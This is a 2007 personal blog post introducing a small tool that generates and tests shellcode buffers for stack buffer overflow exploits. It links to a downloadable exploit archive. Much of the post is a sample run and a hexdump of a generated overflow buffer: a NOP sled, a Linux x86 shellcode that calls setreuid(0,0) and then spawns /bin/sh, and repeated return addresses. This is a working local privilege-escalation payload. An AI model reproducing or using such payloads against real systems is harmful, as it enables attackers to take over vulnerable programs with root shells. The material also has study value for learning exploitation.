Skip to content

Shellcode Tool

Last updated on 2007-04-12

Inspired by an article in german [Hakin9](http://www.hakin9.org/en/) Magazin from October 2005, i wrote a little programm to test and generate shellcode.A good place to learn about buffer overflows is [here](http://community.corest.com/~juliano/).
I found a interesting python framwork called [inlinegg](http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html) for shellcode generating. This make shellcode developing really easy and effective.

My simple tool is used to prepare buffers with shellcode.The actual asm code is done with [nasm](nasm.sourceforge.net) and linked a against a gcc main programm. The programm has three modes: *dump, exec* and *gen*.

**Dump** does a hexdump of the plain shellcode, usefull when tracing null bytes.

For testing the functionality of the shellcode you can use **exec** which simple calls the shellcode like function.

**Gen** is used to build a buffer with the actual shellcode. The code is hexdumped to stdout, raw code it written to stderr and also the enviroment var **$CODE** is set.
Also the target buffer size and stack jump address as to be passed to the program. The buffer ist first filled with the jump address and then the first half with NOPs overwritten. The shellcode gets copied to the middle of the buffer.


./mkbuffer gen 256  0x1234567
Start: 0x0x8048bb0
End:   0x0x8048bd9
Len:   0x29 (41 bytes)
jump:  0x1234567
90
0x0000:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0010:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0020:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0030:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0040:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0050:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0060:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
0x0070:90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31
0x0080:c0 b0 46 31 db 31 c9 cd 80 eb 10 5b 31 c0 88 43
0x0090:07 50 53 89 e1 b0 0b 31 d2 cd 80 e8 eb ff ff ff
0x00a0:2f 62 69 6e 2f 73 68 58 45 23 01 67 45 23 01 67
0x00b0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00c0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00d0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00e0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01 67
0x00f0:45 23 01 67 45 23 01 67 45 23 01 67 45 23 01
setup env $CODE



[Download](http://optixx.org/download/exploit.tar.gz)

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.